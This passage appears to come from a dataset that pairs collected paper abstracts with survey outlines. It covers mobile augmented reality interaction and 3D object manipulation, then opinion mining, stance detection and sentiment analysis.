of cooperative networking, computer vision, and mobile cloud computing transformed mobile augmented reality (MAR) from science fiction to a reality. Although mobile devices are more constrained computationalwise from traditional computers, they have a multitude of sensors that can be used to the development of more sophisticated MAR applications and can be assisted from remote servers for the execution of their intensive parts. In this paper, after introducing the reader to the basics of MAR, we present a categorization of the application fields together with some representative examples. Next, we introduce the reader to the user interface and experience in MAR applications and continue with the core system components of the MAR systems. After that, we discuss advances in tracking and registration, since their functionality is crucial to any MAR application and the network connectivity of the devices that run MAR applications together with its importance to the performance of the application. We continue with the importance of data management in MAR systems and the systems performance and sustainability, and before we conclude this survey, we present existing challenging problems. --- paper_title: Trends in augmented reality tracking, interaction and display: A review of ten years of ISMAR paper_content: Although Augmented Reality technology was first developed over forty years ago, there has been little survey work giving an overview of recent research in the field. 
This paper reviews the ten-year development of the work presented at the ISMAR conference and its predecessors with a particular focus on tracking, interaction and display research. It provides a roadmap for future augmented reality research which will be of great value to this relatively young field, and also for helping researchers decide which topics should be explored when they are beginning their own studies in the area. --- paper_title: A Review on Industrial Augmented Reality Systems for the Industry 4.0 Shipyard paper_content: Shipbuilding companies are upgrading their inner workings in order to create Shipyards 4.0, where the principles of Industry 4.0 are paving the way to further digitalized and optimized processes in an integrated network. Among the different Industry 4.0 technologies, this paper focuses on augmented reality, whose application in the industrial field has led to the concept of industrial augmented reality (IAR). This paper first describes the basics of IAR and then carries out a thorough analysis of the latest IAR systems for industrial and shipbuilding applications. Then, in order to build a practical IAR system for shipyard workers, the main hardware and software solutions are compared. Finally, as a conclusion after reviewing all the aspects related to IAR for shipbuilding, it proposed an IAR system architecture that combines cloudlets and fog computing, which reduce latency response and accelerate rendering tasks while offloading compute intensive tasks from the cloud. --- paper_title: Haptic augmented reality interface using the real force response of an object paper_content: This paper presents the haptic interface system that consists of a base object and a haptic device. The desired force response is achieved by the combination of the real force response of the base object and the virtual force exerted by the haptic device. The proposed haptic augmented reality (AR) system can easily generate the force response of a visco-elastic object with a cheap haptic device and a base object that has the similar visco-elastic property to the target object. In the demonstration, the force response of the target object was generated by using a haptic device only (VR) and using both a haptic device and a base object (AR), respectively. The evaluation experiments by participants show that the AR method has better performance than the VR method. This result indicates the potential of the proposed haptic AR interface. --- paper_title: Expected user experience of mobile augmented reality services: a user study in the context of shopping centres paper_content: The technical enablers for mobile augmented reality (MAR) are becoming robust enough to allow the development of MAR services that are truly valuable for consumers. Such services would provide a novel interface to the ubiquitous digital information in the physical world, hence serving in great variety of contexts and everyday human activities. To ensure the acceptance and success of future MAR services, their development should be based on knowledge about potential end users' expectations and requirements. We conducted 16 semi-structured interview sessions with 28 participants in shopping centres, which can be considered as a fruitful context for MAR services. We aimed to elicit new knowledge about (1) the characteristics of the expected user experience and (2) central user requirements related to MAR in such a context. 
From a pragmatic viewpoint, the participants expected MAR services to catalyse their sense of efficiency, empower them with novel context-sensitive and proactive functionalities and raise their awareness of the information related to their surroundings with an intuitive interface. Emotionally, MAR services were expected to offer stimulating and pleasant experiences, such as playfulness, inspiration, liveliness, collectivity and surprise. The user experience categories and user requirements that were identified can serve as targets for the design of user experience of future MAR services. --- paper_title: Simulating Haptic Feedback Using Vision: A Survey of Research and Applications of Pseudo-Haptic Feedback paper_content: This paper presents a survey of the main results obtained in the field of “pseudo-haptic feedback”: a technique meant to simulate haptic sensations in virtual environments using visual feedback and properties of human visuo-haptic perception. Pseudo-haptic feedback uses vision to distort haptic perception and verges on haptic illusions. Pseudo-haptic feedback has been used to simulate various haptic properties such as the stiffness of a virtual spring, the texture of an image, or the mass of a virtual object. This paper describes the several experiments in which these haptic properties were simulated. It assesses the definition and the properties of pseudo-haptic feedback. It also describes several virtual reality applications in which pseudo-haptic feedback has been successfully implemented, such as a virtual environment for vocational training of milling machine operations, or a medical simulator for training in regional anesthesia procedures. --- paper_title: Current issues in handheld augmented reality paper_content: Equipped with powerful processors, cameras for capturing still images and video, and a range of sensors capable of tracking location, orientation and motion of the user, modern smartphones offer a sophisticated platform for implementing handheld augmented reality (AR) applications. Despite the advances in research and development, implementing AR applications for the smartphone platform remains a challenge due to many open problems related to navigation, contextawareness, visualization, usability and interaction design, as well as content creation and sharing. This paper surveys a number of open challenges and issues, trade-offs and possible solutions in implementing handheld AR applications. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. 
Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation. ---
Title: 3D Object Manipulation Techniques in Handheld Mobile Augmented Reality Interface: A Review Section 1: INTRODUCTION Description 1: Write an introduction that defines augmented reality (AR) using various references, explains its importance, and highlights the focus of the survey. Section 2: MOTIVATION Description 2: Discuss the motivation behind studying 3D object manipulation techniques in handheld mobile AR, highlighting the lack of comprehensive overviews on the topic. Section 3: HANDHELD MOBILE AR INTERFACE Description 3: Describe the significance of handheld mobile AR interfaces, differences from traditional desktop/tabletop AR interfaces, and focus on three major interaction parts: tangible user interaction, multimodal input, and mobile interaction. Section 4: TOUCH-BASED INTERACTION Description 4: Present touch-based interaction techniques for 3D object manipulation in handheld mobile AR, including the challenges and solutions proposed by various studies. Section 5: 3D OBJECT MANIPULATION FOR HANDHELD MOBILE DISPLAYS Description 5: Explain how touch-based interaction techniques have been adapted for small touch-based displays such as smartphones and discuss their effectiveness in 3D object manipulation. Section 6: MID-AIR GESTURES-BASED INTERACTION Description 6: Detail mid-air gestures-based interaction techniques for 3D object manipulation in handheld mobile AR, including the historical development and recent advancements in the field. Section 7: 3D OBJECT MANIPULATION FOR HANDHELD MOBILE AR Description 7: Discuss how mid-air gestures-based interaction techniques have been applied and evaluated in handheld mobile AR environments, and compare them with other interaction techniques. Section 8: DEVICE-BASED INTERACTION Description 8: Describe device-based interaction techniques where the device itself is used for 3D object manipulation, and present examples of early implementations and recent advancements. Section 9: REMAINING ISSUES IN 3D OBJECT MANIPULATION WITHIN HANDHELD MOBILE AR Description 9: Highlight the primary remaining issues in 3D object manipulation within handheld mobile AR, including occlusion, fatigue, position mismatch, and the need for prior knowledge. Section 10: CONCLUSION AND FUTURE DIRECTIONS Description 10: Conclude the survey by summarizing key findings and discussing potential future research directions in 3D object manipulation techniques for handheld mobile AR.
A Survey on Opinion Mining: From Stance to Product Aspect
6
--- paper_title: Review-based measurement of customer satisfaction in mobile service: Sentiment analysis and VIKOR approach paper_content: With the rapid growth and dissemination of mobile services, enhancement of customer satisfaction has emerged as a core issue. Customer reviews are recognized as fruitful information sources for monitoring and enhancing customer satisfaction levels, particularly as they convey the real voices of actual customers expressing relatively unambiguous opinions. As a methodological means of customer review analysis, sentiment analysis has come to the fore. Although several sentiment analysis approaches have proposed extraction of the emotional information from customer reviews, a lacuna remains as to how to effectively analyze customer reviews for the purpose of monitoring customer satisfaction with mobile services. In response, the present study developed a new framework for measurement of customer satisfaction for mobile services by combining VIKOR (in Serbian: VIseKriterijumska Optimizacija I Kompromisno Resenje) and sentiment analysis. With VIKOR, which is a compromise ranking method of the multicriteria decision making (MCDM) approach, customer satisfaction for mobile services can be accurately measured by a sentiment-analysis scheme that simultaneously considers maximum group utility and individual regret. The suggested framework consists mainly of two stages: data collection and preprocessing, and measurement of customer satisfaction. In the first, data collection and preprocessing stage, text mining is utilized to compile customer-review-based dictionaries of attributes and sentiment words. Then, using sentiment analysis, sentiment scores for attributes are calculated for each mobile service. In the second stage, levels of customer satisfaction are measured using VIKOR. For the purpose of illustration, an empirical case study was conducted on customer reviews of mobile application services. We believe that the proposed customer-review-based approach not only saves time and effort in measuring customer satisfaction, but also captures the real voices of customers. --- paper_title: Extra-Linguistic Constraints on Stance Recognition in Ideological Debates paper_content: Determining the stance expressed by an author from a post written for a two-sided debate in an online debate forum is a relatively new problem. We seek to improve Anand et al.'s (2011) approach to debate stance classification by modeling two types of soft extra-linguistic constraints on the stance labels of debate posts: user-interaction constraints and ideology constraints. Experimental results on four datasets demonstrate the effectiveness of these inter-post constraints in improving debate stance classification. --- paper_title: Weakly-Guided User Stance Prediction via Joint Modeling of Content and Social Interaction paper_content: Social media websites have become a popular outlet for online users to express their opinions on controversial issues, such as gun control and abortion. Understanding users' stances and their arguments is a critical task for the policy-making process and public deliberation. Existing methods rely on large amounts of human annotation for predicting stance on issues of interest, which is expensive and hard to scale to new problems.
In this work, we present a weakly-guided user stance modeling framework which simultaneously considers two types of information: what do you say (via stance-based content generative model) and how do you behave (via social interaction-based graph regularization). We experiment with two types of social media data: news comments and discussion forum posts. Our model uniformly outperforms a logistic regression-based supervised method on stance-based link prediction for unseen users on news comments. Our method also achieves better or comparable stance prediction performance for discussion forum users, when compared with state-of-the-art supervised systems. Meanwhile, separate word distributions are learned for users of opposite stances. This potentially helps with better understanding and interpretation of conflicting arguments for controversial issues. --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. ::: In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: Support or Oppose? Classifying Positions in Online Debates from Reply Activities and Opinion Expressions paper_content: We propose a method for the task of identifying the general positions of users in online debates, i.e., support or oppose the main topic of an online debate, by exploiting local information in their remarks within the debate. An online debate is a forum where each user post an opinion on a particular topic while other users state their positions by posting their remarks within the debate. The supporting or opposing remarks are made by directly replying to the opinion, or indirectly to other remarks (to express local agreement or disagreement), which makes the task of identifying users' general positions difficult. A prior study has shown that a link-based method, which completely ignores the content of the remarks, can achieve higher accuracy for the identification task than methods based solely on the contents of the remarks. 
In this paper, we show that utilizing the textual content of the remarks into the link-based method can yield higher accuracy in the identification task. --- paper_title: Cross-Target Stance Classification with Self-Attention Networks paper_content: In stance classification, the target on which the stance is made defines the boundary of the task, and a classifier is usually trained for prediction on the same target. In this work, we explore the potential for generalizing classifiers between different targets, and propose a neural model that can apply what has been learned from a source target to a destination target. We show that our model can find useful information shared between relevant targets which improves generalization in certain scenarios. --- paper_title: Opinion mining and sentiment analysis paper_content: An important part of our information-gathering behavior has always been to find out what other people think. With the growing availability and popularity of opinion-rich resources such as online review sites and personal blogs, new opportunities and challenges arise as people now can, and do, actively use information technologies to seek out and understand the opinions of others. The sudden eruption of activity in the area of opinion mining and sentiment analysis, which deals with the computational treatment of opinion, sentiment, and subjectivity in text, has thus occurred at least in part as a direct response to the surge of interest in new systems that deal directly with opinions as a first-class object. ::: ::: This survey covers techniques and approaches that promise to directly enable opinion-oriented information-seeking systems. Our focus is on methods that seek to address the new challenges raised by sentiment-aware applications, as compared to those that are already present in more traditional fact-based analysis. We include material on summarization of evaluative text and on broader issues regarding privacy, manipulation, and economic impact that the development of opinion-oriented information-access services gives rise to. To facilitate future work, a discussion of available resources, benchmark datasets, and evaluation campaigns is also provided. --- paper_title: Recurrent neural network based language model paper_content: A new recurrent neural network based language model (RNN LM) with applications to speech recognition is presented. Results indicate that it is possible to obtain around 50% reduction of perplexity by using mixture of several RNN LMs, compared to a state of the art backoff language model. Speech recognition experiments show around 18% reduction of word error rate on the Wall Street Journal task when comparing models trained on the same amount of data, and around 5% on the much harder NIST RT05 task, even when the backoff model is trained on much more data than the RNN LM. We provide ample empirical evidence to suggest that connectionist language models are superior to standard n-gram techniques, except their high computational (training) complexity. Index Terms: language modeling, recurrent neural networks, speech recognition --- paper_title: Get Out The Vote: Determining Support Or Opposition From Congressional Floor-Debate Transcripts paper_content: We investigate whether one can determine from the transcripts of U.S. Congressional floor debates whether the speeches represent support of or opposition to proposed legislation. 
To address this problem, we exploit the fact that these speeches occur as part of a discussion; this allows us to use sources of information regarding relationships between discourse segments, such as whether a given utterance indicates agreement with the opinion expressed by another. We find that the incorporation of such information yields substantial improvements over classifying speeches in isolation. --- paper_title: Mining newsgroups using networks arising from social behavior paper_content: Recent advances in information retrieval over hyperlinked corpora have convincingly demonstrated that links carry less noisy information than text. We investigate the feasibility of applying link-based methods in new application domains. The specific application we consider is to partition authors into opposite camps within a given topic in the context of newsgroups. A typical newsgroup posting consists of one or more quoted lines from another posting followed by the opinion of the author. This social behavior gives rise to a network in which the vertices are individuals and the links represent "responded-to" relationships. An interesting characteristic of many newsgroups is that people more frequently respond to a message when they disagree than when they agree. This behavior is in sharp contrast to the WWW link graph, where linkage is an indicator of agreement or common interest. By analyzing the graph structure of the responses, we are able to effectively classify people into opposite camps. In contrast, methods based on statistical analysis of text yield low accuracy on such datasets because the vocabulary used by the two sides tends to be largely identical, and many newsgroup postings consist of relatively few words of text. --- paper_title: OpinionMiner: a novel machine learning system for web opinion mining and extraction paper_content: Merchants selling products on the Web often ask their customers to share their opinions and hands-on experiences on products they have purchased. Unfortunately, reading through all customer reviews is difficult, especially for popular items, for which the number of reviews can run to hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision. The OpinionMiner system designed in this work aims to mine customer reviews of a product and extract highly detailed product entities on which reviewers express their opinions. Opinion expressions are identified and opinion orientations for each recognized product entity are classified as positive or negative. Different from previous approaches that employed rule-based or statistical techniques, we propose a novel machine learning approach built under the framework of lexicalized HMMs. The approach naturally integrates multiple important linguistic features into automatic learning. In this paper, we describe the architecture and main components of the system. The evaluation of the proposed method is presented based on processing the online product reviews from Amazon and other publicly available datasets. --- paper_title: A Convolutional Neural Network for Modelling Sentences paper_content: The ability to accurately represent sentences is central to language understanding. We describe a convolutional architecture dubbed the Dynamic Convolutional Neural Network (DCNN) that we adopt for the semantic modelling of sentences. The network uses Dynamic k-Max Pooling, a global pooling operation over linear sequences.
The network handles input sentences of varying length and induces a feature graph over the sentence that is capable of explicitly capturing short and long-range relations. The network does not rely on a parse tree and is easily applicable to any language. We test the DCNN in four experiments: small scale binary and multi-class sentiment prediction, six-way question classification and Twitter sentiment prediction by distant supervision. The network achieves excellent performance in the first three tasks and a greater than 25% error reduction in the last task with respect to the strongest baseline. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. 
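As a rough, illustrative sketch of the dynamic k-max pooling operation described in the DCNN abstract above: for each feature dimension it keeps the k largest activations over the sentence while preserving their original order, with k shrinking at deeper layers. The NumPy code below is an assumed reading of that idea, not the authors' reference implementation; the dynamic_k schedule and the toy feature map are illustrative.

```python
import numpy as np

def k_max_pooling(feature_map: np.ndarray, k: int) -> np.ndarray:
    """Keep the k largest values in each row (rows = feature dimensions,
    columns = sentence positions), preserving their left-to-right order."""
    top_idx = np.argsort(feature_map, axis=1)[:, -k:]   # positions of the k largest values
    top_idx = np.sort(top_idx, axis=1)                   # restore original ordering
    return np.take_along_axis(feature_map, top_idx, axis=1)

def dynamic_k(layer: int, total_layers: int, sent_len: int, k_top: int) -> int:
    """Illustrative dynamic schedule: deeper layers pool to fewer positions,
    never dropping below the fixed top-level k."""
    return max(k_top, int(np.ceil((total_layers - layer) / total_layers * sent_len)))

# toy usage: a 4-dimensional feature map over a 7-token sentence
fm = np.random.randn(4, 7)
pooled = k_max_pooling(fm, dynamic_k(layer=1, total_layers=3, sent_len=7, k_top=3))
print(pooled.shape)  # (4, 5) for this schedule
```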
--- paper_title: The Power of Negative Thinking: Exploiting Label Disagreement in the Min-cut Classification Framework paper_content: Treating classification as seeking minimum cuts in the appropriate graph has proven effective in a number of applications. The power of this approach lies in its ability to incorporate label-agreement preferences among pairs of instances in a provably tractable way. Label disagreement preferences are another potentially rich source of information, but prior NLP work within the minimum-cut paradigm has not explicitly incorporated them. Here, we report on work in progress that examines several novel heuristics for incorporating such information. Our results, produced within the context of a politically-oriented sentiment-classification task, demonstrate that these heuristics allow for the addition of label-disagreement information in a way that improves classification accuracy while preserving the efficiency guarantees of the minimum-cut framework. --- paper_title: A survey on sentiment detection of reviews paper_content: The sentiment detection of texts has witnessed booming interest in recent years, due to the increased availability of online reviews in digital form and the ensuing need to organize them. To date, mainly four different problems predominate in this research community, namely subjectivity classification, word sentiment classification, document sentiment classification and opinion extraction. In fact, there are inherent relations between them. Subjectivity classification can prevent the sentiment classifier from considering irrelevant or even potentially misleading text. Document sentiment classification and opinion extraction have often involved word sentiment classification techniques. This survey discusses related issues and main approaches to these problems. --- paper_title: Aspect-based opinion mining from product reviews paper_content: "What other people think" has always been an important piece of information for most of us during the decision-making process. Today people tend to make their opinions available to other people via the Internet. As a result, the Web has become an excellent source of consumer opinions. There are now numerous Web resources containing such opinions, e.g., product review forums, discussion groups, and blogs. However, it is difficult for a customer to read all of the reviews and make an informed decision on whether to purchase the product. It is also difficult for the manufacturer of the product to keep track of and manage customer opinions. Also, focusing on just user ratings (stars) is not a sufficient source of information for a user or the manufacturer to make decisions. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'zoom' for a digital camera. A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'great zoom'. In this tutorial we cover opinion mining in online product reviews with the focus on aspect-based opinion mining. This problem is a key task in the area of opinion mining and has attracted a lot of researchers in the information retrieval community recently.
Several opinion-related information retrieval tasks can benefit from the results of aspect-based opinion mining, and it is therefore considered a fundamental problem. This tutorial covers not only general opinion mining and retrieval tasks, but also state-of-the-art methods, challenges, applications, and future research directions of aspect-based opinion mining. --- paper_title: Sentiment analysis algorithms and applications: A survey paper_content: Sentiment Analysis (SA) is an ongoing field of research in the text mining field. SA is the computational treatment of opinions, sentiments and subjectivity of text. This survey paper provides a comprehensive overview of the latest developments in this field. Many recently proposed algorithmic enhancements and various SA applications are investigated and presented briefly in this survey. These articles are categorized according to their contributions to the various SA techniques. Fields related to SA (transfer learning, emotion detection, and building resources) that have recently attracted researchers are discussed. The main target of this survey is to give a nearly full picture of SA techniques and the related fields with brief details. The main contributions of this paper include the sophisticated categorization of a large number of recent articles and the illustration of the recent trend of research in sentiment analysis and its related areas. --- paper_title: Extracting Opinion Expressions with semi-Markov Conditional Random Fields paper_content: Extracting opinion expressions from text is usually formulated as a token-level sequence labeling task tackled using Conditional Random Fields (CRFs). CRFs, however, do not readily model potentially useful segment-level information like syntactic constituent structure. Thus, we propose a semi-CRF-based approach to the task that can perform sequence labeling at the segment level. We extend the original semi-CRF model (Sarawagi and Cohen, 2004) to allow the modeling of arbitrarily long expressions while accounting for their likely syntactic structure when modeling segment boundaries. We evaluate performance on two opinion extraction tasks, and, in contrast to previous sequence labeling approaches to the task, explore the usefulness of segment-level syntactic parse features. Experimental results demonstrate that our approach outperforms state-of-the-art methods for both opinion expression tasks. --- paper_title: Long Short-Term Memory paper_content: Learning to store information over extended time intervals by recurrent backpropagation takes a very long time, mostly because of insufficient, decaying error backflow. We briefly review Hochreiter's (1991) analysis of this problem, then address it by introducing a novel, efficient, gradient-based method called long short-term memory (LSTM). Truncating the gradient where this does not do harm, LSTM can learn to bridge minimal time lags in excess of 1000 discrete-time steps by enforcing constant error flow through constant error carousels within special units. Multiplicative gate units learn to open and close access to the constant error flow. LSTM is local in space and time; its computational complexity per time step and weight is O(1). Our experiments with artificial data involve local, distributed, real-valued, and noisy pattern representations.
In comparisons with real-time recurrent learning, backpropagation through time, recurrent cascade correlation, Elman nets, and neural sequence chunking, LSTM leads to many more successful runs, and learns much faster. LSTM also solves complex, artificial long-time-lag tasks that have never been solved by previous recurrent network algorithms. --- paper_title: Linguistic attention-based model for aspect extraction paper_content: Aspect extraction plays an important role in aspect-level sentiment analysis. Most existing approaches focus on explicit aspect extraction and either rely heavily on syntactic rules or only make use of neural networks without linguistic knowledge. This paper proposes a linguistic attention-based model (LABM) to implement explicit and implicit aspect extraction together. The linguistic attention mechanism incorporates linguistic knowledge, which has proven to be very useful in aspect extraction. We also propose a novel unsupervised training approach, distributed aspect learning (DAL); the core idea of DAL is that the aspect vector should align closely with the neural word embeddings of nouns which are tightly associated with valid aspect indicators. Experimental results using six datasets demonstrate that our model is explainable and outperforms baseline models on evaluation tasks. --- paper_title: Cats Rule and Dogs Drool!: Classifying Stance in Online Debate paper_content: A growing body of work has highlighted the challenges of identifying the stance a speaker holds towards a particular topic, a task that involves identifying a holistic subjective disposition. We examine stance classification on a corpus of 4873 posts across 14 topics on ConvinceMe.net, ranging from the playful to the ideological. We show that ideological debates feature a greater share of rebuttal posts, and that rebuttal posts are significantly harder to classify for stance, for both humans and trained classifiers. We also demonstrate that the number of subjective expressions varies across debates, a fact correlated with the performance of systems sensitive to sentiment-bearing terms. We present results for identifying rebuttals with 63% accuracy, and for identifying stance on a per-topic basis with accuracies that range from 54% to 69%, as compared to unigram baselines that vary between 49% and 60%. Our results suggest that methods that take into account the dialogic context of such posts might be fruitful. --- paper_title: Opinion Mining with Deep Recurrent Neural Networks paper_content: Recurrent neural networks (RNNs) are connectionist models of sequential data that are naturally applicable to the analysis of natural language. Recently, "depth in space" (as an orthogonal notion to "depth in time") in RNNs has been investigated by stacking multiple layers of RNNs and shown empirically to bring a temporal hierarchy to the architecture. In this work we apply these deep RNNs to the task of opinion expression extraction formulated as a token-level sequence-labeling task. Experimental results show that deep, narrow RNNs outperform traditional shallow, wide RNNs with the same number of parameters. Furthermore, our approach outperforms previous CRF-based baselines, including the state-of-the-art semi-Markov CRF model, and does so without access to the powerful opinion lexicons and syntactic features relied upon by the semi-CRF, as well as without the standard layer-by-layer pre-training typically required of RNN architectures.
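To make the "depth in space" idea in the last abstract concrete, the sketch below stacks several bidirectional LSTM layers into a token-level tagger for opinion expressions, using PyTorch. The layer count, hidden size and the assumed O/B-EXPR/I-EXPR tag set are illustrative choices, not the configuration reported in the cited paper.

```python
import torch
import torch.nn as nn

class DeepRNNTagger(nn.Module):
    """Token-level sequence labeler: word embeddings fed through a stacked
    bidirectional LSTM, with per-token scores over BIO opinion-expression tags."""
    def __init__(self, vocab_size, emb_dim=100, hidden_dim=64,
                 num_layers=3, num_tags=3):       # assumed tags: O, B-EXPR, I-EXPR
        super().__init__()
        self.embed = nn.Embedding(vocab_size, emb_dim)
        self.rnn = nn.LSTM(emb_dim, hidden_dim, num_layers=num_layers,
                           batch_first=True, bidirectional=True)
        self.out = nn.Linear(2 * hidden_dim, num_tags)

    def forward(self, token_ids):                 # (batch, seq_len)
        h, _ = self.rnn(self.embed(token_ids))    # (batch, seq_len, 2 * hidden_dim)
        return self.out(h)                        # per-token tag scores

# toy usage with random token ids
model = DeepRNNTagger(vocab_size=5000)
scores = model(torch.randint(0, 5000, (2, 12)))
print(scores.shape)  # torch.Size([2, 12, 3])
```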
--- paper_title: Exploring Various Linguistic Features for Stance Detection paper_content: In this paper, we describe our participation in the fourth shared task (NLPCC-ICCPOL 2016 Shared Task 4) on stance detection in Chinese micro-blogs (subtask A). Beyond ordinary features, we explore four types of linguistic features, namely lexical, morphological, semantic and syntactic features of Chinese micro-blogs, in the stance classifier, and obtain good performance, ranking third among sixteen systems. --- paper_title: Semantic sentiment analysis of twitter paper_content: Sentiment analysis over Twitter offers organisations a fast and effective way to monitor the public's feelings towards their brand, business, directors, etc. A wide range of features and methods for training sentiment classifiers for Twitter datasets have been researched in recent years with varying results. In this paper, we introduce a novel approach of adding semantics as additional features into the training set for sentiment analysis. For each entity extracted from tweets (e.g. iPhone), we add its semantic concept (e.g. "Apple product") as an additional feature, and measure the correlation of the representative concept with negative/positive sentiment. We apply this approach to predict sentiment for three different Twitter datasets. Our results show an average increase in the F harmonic accuracy score for identifying both negative and positive sentiment of around 6.5% and 4.8% over the unigram and part-of-speech feature baselines, respectively. We also compare against an approach based on sentiment-bearing topic analysis, and find that semantic features produce better Recall and F score when classifying negative sentiment, and better Precision with lower Recall and F score in positive sentiment classification. --- paper_title: Whose and what chatter matters? The effect of tweets on movie sales paper_content: Social broadcasting networks such as Twitter in the U.S. and "Weibo" in China are transforming the way online word of mouth (WOM) is disseminated and consumed in the digital age. In the present study, we investigated whether and how Twitter WOM affects movie sales by estimating a dynamic panel data model using publicly available data and well-known machine learning algorithms. We found that chatter on Twitter does matter; however, the magnitude and direction of the effect depend on whom the WOM is from and what the WOM is about. Incorporating the number of followers the author of each WOM message had into our study, we found that the effect of WOM from users followed by more Twitter users is significantly larger than that of WOM from users followed by fewer Twitter users. In support of some recent findings about the importance of WOM valence on product sales, we also found that positive Twitter WOM is associated with higher movie sales, whereas negative WOM is associated with lower movie sales. Interestingly, we found that the strongest effect on movie sales comes from those tweets in which the authors expressed their intention to watch a certain movie. We attribute this finding to the dual effects of such intention tweets on movie sales: the direct effect through the WOM author's own purchase behavior, and the indirect effect through either the awareness effect or the persuasive effect of the WOM on its recipients. Our findings provide new perspectives to understand the effect of WOM on product sales and have important managerial implications.
For example, our study reveals the potential values of monitoring people's intentions and sentiments on Twitter and identifying influential users for companies wishing to harness the power of social broadcasting networks. --- paper_title: Efficient Estimation of Word Representations in Vector Space paper_content: We propose two novel model architectures for computing continuous vector representations of words from very large data sets. The quality of these representations is measured in a word similarity task, and the results are compared to the previously best performing techniques based on different types of neural networks. We observe large improvements in accuracy at much lower computational cost, i.e. it takes less than a day to learn high quality word vectors from a 1.6 billion words data set. Furthermore, we show that these vectors provide state-of-the-art performance on our test set for measuring syntactic and semantic word similarities. --- paper_title: Relevant Emotion Ranking from Text Constrained with Emotion Relationships paper_content: Text might contain or invoke multiple emotions with varying intensities. As such, emotion detection, to predict multiple emotions associated with a given text, can be cast into a multi-label classification problem. We would like to go one step further so that a ranked list of relevant emotions are generated where top ranked emotions are more intensely associated with text compared to lower ranked emotions, whereas the rankings of irrelevant emotions are not important. A novel framework of relevant emotion ranking is proposed to tackle the problem. In the framework, the objective loss function is designed elaborately so that both emotion prediction and rankings of only relevant emotions can be achieved. Moreover, we observe that some emotions cooccur more often while other emotions rarely co-exist. Such information is incorporated into the framework as constraints to improve the accuracy of emotion detection. Experimental results on two real-world corpora show that the proposed framework can effectively deal with emotion detection and performs remarkably better than the state-of-the-art emotion detection approaches and multi-label learning methods. --- paper_title: Deriving market intelligence from microblogs paper_content: Given their rapidly growing popularity, microblogs have become great sources of consumer opinions. However, in the face of unique properties and the massive volume of posts on microblogs, this paper proposes a framework that provides a compact numeric summarization of opinions on such platforms. The proposed framework is designed to cope with the following tasks: trendy topics detection, opinion classification, credibility assessment, and numeric summarization. An experiment is carried out on Twitter, the largest microblog website, to prove the effectiveness of the proposed framework. We find that the consideration of user credibility and opinion subjectivity is essential for aggregating microblog opinions. The proposed mechanism can effectively discover market intelligence (MI) for supporting decision-makers. --- paper_title: Double Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. 
